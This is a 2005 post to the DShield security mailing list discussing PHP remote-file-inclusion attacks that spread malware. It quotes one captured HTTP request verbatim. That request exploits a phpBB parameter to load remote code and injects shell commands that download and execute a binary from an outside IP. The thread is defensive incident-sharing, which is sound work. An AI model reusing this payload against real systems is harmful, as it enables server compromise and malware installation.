[Dshield] PHP attacks (was Re:Destructive botnet originating from Japan]

Frank Knobbe frank at knobbe.us
Sun Dec 25 00:07:55 GMT 2005


On Sat, 2005-12-24 at 16:31 -0500, Jeff Kell wrote:
> Just spotted this on one of my sensors (obfuscated http: but otherwise 
> verbatim):
> 
> >GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=h t t p://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1


Jeff,

I don't think that's related to the DoS attack. There is some nastyware
out there trying to spread this way. We've observed this sort of stuff
since beginning of December with the IP addresses being those of zombies
spreading the nastyware. Hop on over to the #shadowserver-mw channel.
The ShadowServer crew has an interesting project that automatically
inventories and catalogs the malware that's spreading from there. The
URL hits are identical (ie. cmd.gif).

I wrote a quick hack the other day to import these type of events and
have Snortsam block these hosts automatically. Let me know if you want a
copy of that particular feed.

Merry Christmas!
Frank
(close to releasing a Christmas version of Snortsam)

-- 
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: This is a digitally signed message part
Url : http://www.dshield.org/pipermail/list/attachments/20051224/947ec486/attachment.bin


More information about the list mailing list